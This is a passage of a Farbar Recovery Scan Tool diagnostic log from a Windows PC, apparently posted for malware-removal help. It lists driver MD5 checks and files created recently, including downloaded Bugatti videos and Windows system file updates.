C:\Windows\System32\drivers\drmkaud.sys ==> MD5 is legit
C:\Windows\System32\drivers\dxgkrnl.sys ==> MD5 is legit
C:\Windows\system32\drivers\evbda.sys ==> MD5 is legit
C:\Windows\System32\Drivers\ElbyCDFL.sys 9387A484D31209D7FC3F795A787294DB
C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys 9387A484D31209D7FC3F795A787294DB
C:\Windows\System32\Drivers\ElbyCDIO.sys 702D5606CF2199E0EDEA6F0E0D27CD10
C:\Windows\system32\drivers\elxstor.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\emusba10.sys 942BEF139CBBA86C68A6418B7774B918
C:\Windows\system32\drivers\errdev.sys ==> MD5 is legit
C:\Windows\System32\Drivers\exfat.sys ==> MD5 is legit
C:\Windows\System32\Drivers\fastfat.sys ==> MD5 is legit
C:\Windows\system32\drivers\fdc.sys ==> MD5 is legit
C:\Windows\System32\drivers\fileinfo.sys ==> MD5 is legit
C:\Windows\System32\drivers\filetrace.sys ==> MD5 is legit
C:\Windows\system32\drivers\flpydisk.sys ==> MD5 is legit
C:\Windows\System32\drivers\fltmgr.sys ==> MD5 is legit
C:\Windows\System32\drivers\FsDepends.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Fs_Rec.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\fvevol.sys ==> MD5 is legit
C:\Windows\system32\drivers\gagp30kx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\hamachi.sys 1E6438D4EA6E1174A3B3B1EDC4DE660B
C:\Windows\system32\drivers\hardlock.sys 78FAD9117E4527F2CA82259DA10F40BD
C:\Windows\system32\drivers\hcmon.sys 3CC07DAD48FA53193AE2F85DD8200B5E
C:\Windows\system32\drivers\hcw85cir.sys ==> MD5 is legit
C:\Windows\System32\drivers\HdAudio.sys 975761C778E33CD22498059B91E7373A
C:\Windows\System32\DRIVERS\HDAudBus.sys ==> MD5 is legit
C:\Windows\system32\drivers\HidBatt.sys ==> MD5 is legit
C:\Windows\system32\drivers\hidbth.sys ==> MD5 is legit
C:\Windows\system32\drivers\hidir.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\hidusb.sys ==> MD5 is legit
C:\Windows\system32\drivers\HpSAMD.sys ==> MD5 is legit
C:\Windows\System32\drivers\HTTP.sys ==> MD5 is legit
C:\Windows\System32\drivers\hwpolicy.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\i8042prt.sys ==> MD5 is legit
C:\Windows\system32\drivers\iaStorV.sys ==> MD5 is legit
C:\Windows\system32\drivers\iirsp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\inspect.sys CB291C2B457DDD8EDC6B9A6AF0C4C8A3
C:\Windows\System32\drivers\RTKVHD64.sys 589B94A9B73A0E819FF873743A480834
C:\Windows\system32\drivers\intelide.sys ==> MD5 is legit
C:\Windows\system32\drivers\intelppm.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ipfltdrv.sys ==> MD5 is legit
C:\Windows\system32\drivers\IPMIDrv.sys ==> MD5 is legit
C:\Windows\System32\drivers\ipnat.sys ==> MD5 is legit
C:\Windows\System32\drivers\irenum.sys ==> MD5 is legit
C:\Windows\system32\drivers\isapnp.sys ==> MD5 is legit
C:\Windows\system32\drivers\msiscsi.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\kbdclass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\kbdhid.sys ==> MD5 is legit
C:\Windows\System32\Drivers\ksecdd.sys 3AAA10BAF3F194F7CD34F4C78F8222EE
C:\Windows\System32\Drivers\ksecpkg.sys 7B7C28D4E71E4A4365F2B7528DA619F8
C:\Windows\system32\drivers\ksthunk.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\lltdio.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_fc.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_sas.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_sas2.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_scsi.sys ==> MD5 is legit
C:\Windows\system32\drivers\luafv.sys ==> MD5 is legit
C:\Windows\system32\drivers\megasas.sys ==> MD5 is legit
C:\Windows\system32\drivers\MegaSR.sys ==> MD5 is legit
C:\Windows\System32\drivers\modem.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\monitor.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\motmodem.sys 940F4DA752E28E6C4B1090D21AEB7B80
C:\Windows\System32\DRIVERS\mouclass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mouhid.sys ==> MD5 is legit
C:\Windows\System32\drivers\mountmgr.sys ==> MD5 is legit
C:\Windows\system32\drivers\mpio.sys ==> MD5 is legit
C:\Windows\System32\drivers\mpsdrv.sys ==> MD5 is legit
C:\Windows\system32\drivers\mrxdav.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mrxsmb.sys 819426D736BCBD31CC7CA27221954E04
C:\Windows\System32\DRIVERS\mrxsmb10.sys 85CB449B319AF69A3538BB1B97EEA2E5
C:\Windows\System32\DRIVERS\mrxsmb20.sys C0B2DC34587FE163997055AA38EB883A
C:\Windows\system32\drivers\msahci.sys ==> MD5 is legit
C:\Windows\system32\drivers\msdsm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Msfs.sys ==> MD5 is legit
C:\Windows\System32\drivers\mshidkmdf.sys ==> MD5 is legit
C:\Windows\System32\drivers\msisadrv.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSKSSRV.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSPCLOCK.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSPQM.sys ==> MD5 is legit
C:\Windows\System32\Drivers\MsRPC.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mssmbios.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSTEE.sys ==> MD5 is legit
C:\Windows\system32\drivers\MTConfig.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ASACPI.sys 19B006B181E3875FD254F7B67ACF1E7C
C:\Windows\System32\Drivers\mup.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\nwifi.sys ==> MD5 is legit
C:\Windows\System32\drivers\ndis.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndiscap.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndistapi.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndisuio.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndiswan.sys ==> MD5 is legit
C:\Windows\System32\Drivers\NDProxy.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\netbios.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\netbt.sys ==> MD5 is legit
C:\Windows\System32\drivers\networx.sys 3A02E2CF4CC836ABE474B5BD63719772
C:\Windows\system32\drivers\nfrd960.sys ==> MD5 is legit
C:\Windows\System32\drivers\ccdcmbx64.sys 985A3F046DFCD58E26D3A95283BB8F1D
C:\Windows\System32\drivers\ccdcmbox64.sys 5EB41A9656388DC21119CCC33F0EE22A
C:\Windows\System32\Drivers\Npfs.sys ==> MD5 is legit
C:\Windows\System32\drivers\nsiproxy.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Ntfs.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Null.sys ==> MD5 is legit
C:\Windows\System32\drivers\nvhda64v.sys 4938CCA6E12A7FDA5324FFF0DF5DB8EC
C:\Windows\System32\DRIVERS\nvlddmkm.sys 1BC48196ED1F9A5662559ED8ABF6A734
C:\Windows\system32\drivers\nvraid.sys ==> MD5 is legit
C:\Windows\system32\drivers\nvstor.sys ==> MD5 is legit
C:\Windows\system32\drivers\nv_agp.sys ==> MD5 is legit
C:\Windows\system32\drivers\ohci1394.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\parport.sys ==> MD5 is legit
C:\Windows\SysWOW64\drivers\Partizan.sys 032F1C32A6A97C317AEFF9D64D2A1D8A
C:\Windows\System32\drivers\partmgr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\pccsmcfdx64.sys BC0018C2D29F655188A0ED3FA94FDB24
C:\Windows\System32\drivers\pci.sys ==> MD5 is legit
C:\Windows\System32\drivers\pciide.sys ==> MD5 is legit
C:\Windows\system32\drivers\pcmcia.sys ==> MD5 is legit
C:\Windows\System32\drivers\pcw.sys ==> MD5 is legit
C:\Windows\System32\drivers\peauth.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\pneteth.sys A010F13D27C1033A8BE09D5FA9BF348B
C:\Windows\System32\DRIVERS\raspptp.sys ==> MD5 is legit
C:\Windows\system32\drivers\processr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\pacer.sys ==> MD5 is legit
C:\Windows\System32\drivers\pstrip64.sys 23EED24B0A780863DF35B500C4EA0733
C:\Windows\system32\drivers\ql2300.sys ==> MD5 is legit
C:\Windows\system32\drivers\ql40xx.sys ==> MD5 is legit
C:\Windows\system32\drivers\qwavedrv.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rasacd.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\AgileVpn.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rasl2tp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\raspppoe.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rassstp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rdbss.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rdpbus.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\RDPCDD.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpdr.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpencdd.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdprefmp.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpvideominiport.sys ==> MD5 is legit
C:\Windows\System32\Drivers\RDPWD.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdyboost.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\revoflt.sys D2864254401A27FB3F5EBD495857D92C
C:\Windows\System32\DRIVERS\rspndr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\Rt64win7.sys 09210D1340433EE0054F0DE1E0D3658F
C:\Windows\system32\drivers\vms3cap.sys ==> MD5 is legit
C:\Windows\system32\drivers\sbp2port.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\scfilter.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\serenum.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\serial.sys ==> MD5 is legit
C:\Windows\system32\drivers\sermouse.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffdisk.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_mmc.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_sd.sys ==> MD5 is legit
C:\Windows\system32\drivers\sfloppy.sys ==> MD5 is legit
C:\Windows\system32\drivers\SiSRaid2.sys ==> MD5 is legit
C:\Windows\system32\drivers\sisraid4.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\smb.sys ==> MD5 is legit
C:\Windows\System32\Drivers\spldr.sys ==> MD5 is legit
C:\Windows\System32\Drivers\sptd.sys D6AB7C13FCDD2E4CAC35244D2C172D9A
C:\Windows\System32\DRIVERS\srv.sys EB15C46477EB84B6B520871ED5936CCF
C:\Windows\System32\DRIVERS\srv2.sys 7F4FDC9528BCE6FB919615B6A77D5724
C:\Windows\System32\DRIVERS\srvnet.sys 3F20CD2A11872284BD667DAD6D4801CC
C:\Windows\system32\drivers\stexstor.sys ==> MD5 is legit
C:\Windows\System32\drivers\vmstorfl.sys ==> MD5 is legit
C:\Windows\system32\drivers\storvsc.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\swenum.sys ==> MD5 is legit
C:\Windows\System32\drivers\synth3dvsc.sys C3A39C4079305480972D29C44B868C78
C:\Windows\System32\DRIVERS\tap0901t.sys DC643A36180AD0FA9439928EF2C98D02
C:\Windows\System32\drivers\tcpip.sys FC62769E7BFF2896035AEED399108162
C:\Windows\System32\DRIVERS\tcpip.sys FC62769E7BFF2896035AEED399108162
C:\Windows\System32\drivers\tcpipreg.sys ==> MD5 is legit
C:\Windows\System32\drivers\tdpipe.sys ==> MD5 is legit
C:\Windows\System32\drivers\tdtcp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\tdx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\termdd.sys ==> MD5 is legit
C:\Windows\system32\drivers\terminpt.sys 2B5BDFF688EC9871D7EC5837833374E9
C:\Windows\System32\DRIVERS\tssecsrv.sys ==> MD5 is legit
C:\Windows\System32\drivers\tsusbflt.sys ==> MD5 is legit
C:\Windows\system32\drivers\TsUsbGD.sys 9CC2CCAE8A84820EAECB886D477CBCB8
C:\Windows\System32\drivers\tsusbhub.sys E1748D04AE40118B62BC18AC86032192
C:\Windows\System32\DRIVERS\tunnel.sys ==> MD5 is legit
C:\Windows\system32\drivers\uagp35.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\udfs.sys ==> MD5 is legit
C:\Windows\system32\drivers\uliagpkx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\umbus.sys ==> MD5 is legit
C:\Windows\system32\drivers\umpass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbser_lowerfltx64.sys AFA3A0937B7044A8322D8BC91722C53B
C:\Windows\System32\DRIVERS\usbccgp.sys ==> MD5 is legit
C:\Windows\system32\drivers\usbcir.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbehci.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbhub.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbohci.sys ==> MD5 is legit
C:\Windows\system32\drivers\usbprint.sys ==> MD5 is legit
C:\Windows\System32\drivers\usbser.sys 4ACEE387FA8FD39F83564FCD2FC234F2
C:\Windows\System32\DRIVERS\usbser_lowerfltjx64.sys B826F3FF5A1975CC9096B4CAADDE77B6
C:\Windows\System32\DRIVERS\USBSTOR.SYS ==> MD5 is legit
C:\Windows\system32\drivers\usbuhci.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\VBoxDrv.sys CDA796F41C2B64CEEC143B3A86904CFB
C:\Windows\System32\DRIVERS\VBoxNetAdp.sys 8CD776EB77695524CCE594AAC3A71569
C:\Windows\System32\DRIVERS\VBoxUSBMon.sys 0E3C4F20B2CE21168F3242D9CAC6CBF2
C:\Windows\System32\drivers\vdrvroot.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vgapnp.sys ==> MD5 is legit
C:\Windows\System32\drivers\vga.sys ==> MD5 is legit
C:\Windows\system32\drivers\vhdmp.sys ==> MD5 is legit
C:\Windows\system32\drivers\viaide.sys ==> MD5 is legit
C:\Windows\system32\drivers\vmbus.sys 80E731A278695B47345D0171A19E428B
C:\Windows\system32\drivers\VMBusHID.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vmci.sys 6203C901DEFF10631AAD919B3BD1489B
C:\Windows\system32\Drivers\vmm.sys C6F8FBDE19960E0B172CD76D2677F5E2
C:\Windows\System32\DRIVERS\vmnetadapter.sys AEF53B47E960F227BF7638A6A1A9D5C6
C:\Windows\System32\DRIVERS\vmnetbridge.sys C234A1DC2F06A15B9210787F54253810
C:\Windows\system32\drivers\vmnetuserif.sys 25FBBC8C168AEE1753C330352EA6D009
C:\Windows\system32\drivers\VMparport.sys 35EF11B49B407FF34498019691147528
C:\Windows\System32\Drivers\vmusb.sys 415B167695C4B5960A13098622EF3D80
C:\Windows\system32\drivers\vmx86.sys D37CB37BF3FB6612BCA19D81EFA16122
C:\Windows\System32\drivers\volmgr.sys ==> MD5 is legit
C:\Windows\System32\drivers\volmgrx.sys ==> MD5 is legit
C:\Windows\System32\drivers\volsnap.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\VMNetSrv.sys 6BDCA00FC57CC40DA3C8E88B2CEA21AB
C:\Windows\system32\drivers\vsmraid.sys ==> MD5 is legit
C:\Windows\System32\drivers\vsock.sys EF1E48D431223F670CFFD6169B1A136F
C:\Windows\SysWow64\drivers\vstor2-mntapi10-shared.sys 65EFAEC68FA234F36880533A79D7B1C1
C:\Windows\System32\drivers\vwifibus.sys ==> MD5 is legit
C:\Windows\system32\drivers\wacompen.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\system32\drivers\wd.sys ==> MD5 is legit
C:\Windows\System32\drivers\Wdf01000.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wfplwf.sys ==> MD5 is legit
C:\Windows\System32\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\SysWOW64\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\WinUSB.sys FE88B288356E7B47B74B13372ADD906D
C:\Windows\System32\drivers\WmBEnum.sys 680A7846370000D20D7E74917D5B7936
C:\Windows\System32\drivers\WmFilter.sys 14C35BA8189C6F65D839163AA285E954
C:\Windows\System32\DRIVERS\wmiacpi.sys ==> MD5 is legit
C:\Windows\System32\drivers\WmVirHid.sys 8488DD91A3EE54A8E29F02AD7BB8201E
C:\Windows\System32\drivers\WmXlCore.sys 14802B3A30AA849C97CB968CCC813BF3
C:\Windows\system32\drivers\ws2ifsl.sys ==> MD5 is legit
C:\Windows\System32\drivers\WudfPf.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\WUDFRd.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\xnacc.sys 4A5CE13408945E525503B5F73D29B9C5
C:\Windows\System32\DRIVERS\xusb21.sys 2C6BC21B2D5B58D8B1D638C1704CB494
C:\Program Files (x86)\Bignox\BigNoxVM\RT\YSDrv.sys 27578F40FD3C5EFD43563A266476F466
C:\Windows\System32\Drivers\a37m65i9.sys D41D8CD98F00B204E9800998ECF8427E
C:\Windows\System32\Drivers\ac2cjxl8.sys D41D8CD98F00B204E9800998ECF8427E
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== Three Months Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2018-02-07 16:39 - 2018-02-07 16:40 - 000000000 ____D C:\FRST
2018-02-07 16:37 - 2018-02-07 16:40 - 000000000 ____D C:\Users\Markus\Desktop\FRST
2018-02-07 16:37 - 2018-02-07 16:37 - 002393088 _____ (Farbar) C:\Users\Markus\Downloads\FRST64.exe
2018-02-06 19:12 - 2018-02-06 19:13 - 073218333 _____ C:\Users\Markus\Downloads\The one and only Bugatti Aerolithe.mp4
2018-02-06 18:21 - 2018-02-06 18:22 - 112584201 _____ C:\Users\Markus\Downloads\1935 Bugatti Aerolithe Coupe - Jay Leno's Garage.mp4
2018-02-06 18:17 - 2018-02-06 18:17 - 114133884 _____ C:\Users\Markus\Downloads\History of the 1935 Bugatti Aerolithé.mp4
2018-02-05 11:15 - 2018-02-05 11:15 - 000299128 _____ C:\Windows\system32\FNTCACHE.DAT
2018-02-05 02:52 - 2018-02-05 02:52 - 000066744 _____ C:\Users\Markus\AppData\Local\GDIPFONTCACHEV1.DAT
2018-01-29 19:00 - 2018-01-29 19:00 - 000000000 ____D C:\Users\Markus\Documents\Tunngle
2018-01-28 21:34 - 2017-02-11 18:58 - 000462848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2018-01-28 21:34 - 2017-02-11 18:58 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2018-01-28 21:34 - 2017-02-11 18:58 - 000168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2018-01-28 21:34 - 2017-02-10 19:32 - 001551872 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2018-01-28 21:34 - 2017-02-10 19:32 - 001149440 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2018-01-28 21:34 - 2017-02-10 19:32 - 000803328 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2018-01-28 21:34 - 2017-02-10 19:32 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2018-01-28 21:34 - 2017-02-10 19:17 - 001081856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2018-01-28 21:34 - 2017-02-10 19:17 - 000628736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2018-01-28 21:34 - 2017-02-10 19:17 - 000312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2018-01-28 21:34 - 2017-02-09 19:36 - 000631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2018-01-28 21:34 - 2017-02-09 19:35 - 005548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2018-01-28 21:34 - 2017-02-09 19:35 - 000706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2018-01-28 21:34 - 2017-02-09 19:35 - 000154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2018-01-28 21:34 - 2017-02-09 19:35 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2018-01-28 21:34 - 2017-02-09 19:33 - 001732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 001212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 001460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 001163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000250880 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
